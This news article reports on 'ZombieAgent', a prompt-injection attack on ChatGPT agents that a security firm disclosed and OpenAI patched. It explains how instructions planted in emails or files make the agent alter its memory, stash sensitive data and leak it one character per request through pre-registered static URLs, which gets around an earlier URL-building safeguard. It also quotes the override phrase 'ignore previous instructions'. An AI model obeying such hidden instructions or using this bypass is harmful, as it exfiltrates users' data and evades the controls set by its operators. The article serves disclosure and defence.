OpenAI has quietly fixed a critical security weakness that, according to new research, could have turned its enterprise-grade ChatGPT agents into stealth data mules for attackers.
The flaw, tied to a technique researchers call “ZombieAgent,” allegedly allowed malicious prompts to trick ChatGPT into visiting attacker-controlled URLs through built-in connectors, then drip sensitive data to those sites one character at a time.
Security firm Radware, which disclosed the issue, says the bug was serious enough to threaten emails, cloud files, and other business systems wired into OpenAI’s agent features.
“Enterprises rely on these agents to make decisions and access sensitive systems,” said Pascal Geenens, director of threat intelligence at Radware. “But they lack visibility into how agents interpret untrusted content or what actions they execute in the cloud. This creates a dangerous blind spot that attackers are already exploiting.”
OpenAI patched the issue on December 16, 2025, after what researchers describe as a vulnerability window stretching at least three months. The company says it has found no confirmed customer incidents, but it has also acknowledged that prompt injection remains “an open challenge” for AI security.
How ‘ZombieAgent’ Brought Data Back From the Dead
The ZombieAgent attack didn’t hinge on clever wording alone. It chained together multiple agent features that enterprises increasingly treat as standard: memory, email and file connectors, and autonomous task execution.
Radware’s analysis describes the scheme as a multi-step process.
First, an attacker plants instructions inside a file or email that the AI agent is supposed to process—such as a shared document in cloud storage or a message in an inbox. Those instructions, written in natural language, tell the agent to tamper with its own long-term memory, quietly save any sensitive user data it encounters, and later obey additional commands hidden in future emails.
Then comes the data exfiltration trick.
In response to earlier “ShadowLeak” attacks, OpenAI had tried to close off one obvious avenue by blocking agents from dynamically building URLs that included stolen data as parameters. The patch forced ChatGPT to open URLs “exactly as provided,” rather than assembling them on the fly.
ZombieAgent found a way around that rule.
Instead of asking the model to construct a single malicious URL with data embedded inside, the attacker pre-registers many static URLs, each ending with a different character—paths such as /a, /b, /c, and so on. The prompt then tells the agent: for each character in the secret data you stored, choose the matching URL and open it through a connector.
Each outbound request leaks exactly one character. Over time, the full sequence of calls spells out the stolen data on the attacker’s server, even though the model never “builds” a new URL and appears to be following the rule of opening addresses exactly as provided.
“The genius of this attack is its simplicity,” said one CISO at a large financial firm, who requested anonymity because they are still assessing exposure. “OpenAI told the model: ‘Don’t change URLs.’ So the attackers said: fine, we’ll change which URL you choose instead.”
The attack also took advantage of how OpenAI separated memory and connectors. Earlier defenses tried to keep both from operating together in a single agent run. According to Radware, ZombieAgent split the work into phases: write secrets to memory in one operation, then call connectors in a later step, still within the same session.
From a data-flow perspective, the result was the same: information moved from inbox to model to attacker. From an architectural standpoint, the operation slipped through gaps in OpenAI’s guardrails.
Months-Long Window, Murky Scope
The incident follows a pattern that is becoming familiar in the world of large language models.
ShadowLeak, an earlier prompt-injection technique, first targeted OpenAI’s “Deep Research” workflow, which could read Gmail, Outlook, Google Drive, and GitHub on a user’s behalf. OpenAI patched that bug on September 3, 2025.
Not long after, ZombieAgent appeared on ChatGPT Atlas, a browser-based agent designed to handle complex, multi-step business tasks. Radware filed its initial bug report on September 26. The patch arrived in mid-December.
That timeline implies a likely exposure window of more than three months, from at least early September through December 16, 2025. Researchers warn that the underlying weaknesses may have been present even earlier.
What remains unclear is which OpenAI products were actually at risk.
OpenAI has not said whether ChatGPT for Enterprise, custom GPTs, or API-based agents shared the same vulnerable architecture. It has also not detailed which third-party connectors—beyond the major email and storage platforms—were fully exposed.
There is, so far, no public evidence that attackers successfully ran ZombieAgent in the wild. Radware has not released logs or telemetry showing live campaigns. OpenAI has not reported any customer-impacting breaches tied specifically to this flaw.
That uncertainty leaves enterprise security leaders in an uncomfortable position.
“This is the worst place for a CISO to be,” said a healthcare security lead at a Midwestern hospital network. “You have a serious theoretical hole, no proof of exploitation, and no way to go back in time and see what an AI agent was ‘thinking’ months ago.”
OpenAI’s Fix: Stronger Model, Few Details
When the fix rolled out in December, OpenAI framed it as part of a broader hardening of its agent stack rather than a one-off bug patch.
The company deployed a new adversarially trained model intended to better resist prompt injection across long, multi-step workflows. It also pointed to “strengthened safeguards” and internal automated red-teaming systems that use reinforcement learning to hunt for novel attacks before they reach customers.
What OpenAI did not do was spell out the specifics.
The company has not said whether it now uses URL allowlists, more granular outbound request filters, or tighter sandboxing for connectors. It also has not explained in detail how it now limits the interplay between memory and connectors within the same session.
For developers and CISOs, that lack of transparency cuts both ways.
On one side, too much detail can hand attackers a blueprint for the next bypass. On the other, major customers are plugging OpenAI’s agents into core systems—from CRMs and ticketing tools to internal wikis and document stores—without a clear picture of how those agents are fenced in.
“Right now, we’re being asked to trust a black box that can read our mailboxes and our drive,” the bank CISO said. “When something like ZombieAgent appears, we’re reminded that even the vendor doesn’t fully control what happens inside.”
A Pattern of Patch, Bypass, Repeat
The ZombieAgent episode underscores a broader trend in how LLM defenses are being tested and broken.
Early incidents, such as the Bing Chat prompt leak in 2023 and repeated system prompt extractions from custom GPTs, tended to rely on blunt overrides like “ignore previous instructions.” Vendors responded with new prompts, policy layers, and heuristic checks, often after the vulnerabilities played out in public.
ShadowLeak and ZombieAgent represent a second phase. Here, the focus shifts from surface-level prompts to the underlying agent architecture: how models, tools, memory, and external connectors are wired together.
The pace is picking up. The ShadowLeak fix in early September was followed by the ZombieAgent bypass in roughly three months. Each patch closes one obvious door but seems to expose new seams elsewhere.
OpenAI itself has started to describe prompt injection as a problem that may never be fully solved. Most defenses today operate at the level of prompts, individual tools, or isolated features. The real risk, however, sits at the data-flow level: once an agent is allowed to read from one system and write to another, any sequence of “legitimate” steps can be turned into a covert channel.
Seen that way, the December fix is less an endpoint than the latest turn in a running arms race between attackers and defenders.
High Stakes for Regulators and the AI Market
For heavily regulated sectors, the implications go well beyond technical detail.
If a hospital, bank, or insurer wired ChatGPT agents into patient records, transaction histories, or policy documents, a ZombieAgent-style exfiltration could trigger breach-notification laws—even if the root cause sat deep inside OpenAI’s code base.
The problem is that audit trails for autonomous agents are still thin. Many organizations log user prompts and final outputs but not the internal chain of tool calls, memory edits, and URL fetches that a prompt-injection attack might drive.
That disconnect creates tension between existing compliance frameworks—such as SOC 2, HIPAA, and PCI-DSS—and the realities of deploying agentic AI in production.
“Boards signed off on these deployments thinking of them as smarter chatbots,” the hospital security lead said. “They didn’t realize they were effectively installing cloud robots with keys to the kingdom.”
Rivals are already trying to turn this into a competitive edge. Companies like Anthropic and Google are pitching tighter sandboxing and stricter tool policies as selling points. Cloud providers, including AWS and Azure, are racing to bolt AI-aware security controls onto their platforms.
At the same time, a new class of startups is offering products such as:
- “AI firewalls” that sit between models and external systems
- Agent sandboxes that constrain how tools and connectors are used
- Policy engines that monitor data flows and flag suspicious patterns
The open question is whether these external controls can keep pace with the speed of model and product changes from vendors like OpenAI, or whether they will chronically lag behind the next ShadowLeak or ZombieAgent-style bypass.
For now, OpenAI says the exfiltration chain ZombieAgent relied on has been dismantled. The immediate risk is reduced. But as enterprises hand more of their critical workflows to autonomous AI agents, one question will continue to shadow every new feature and integration:
Is this agent doing what we asked—or what someone else told it to do, hidden in the data we fed it?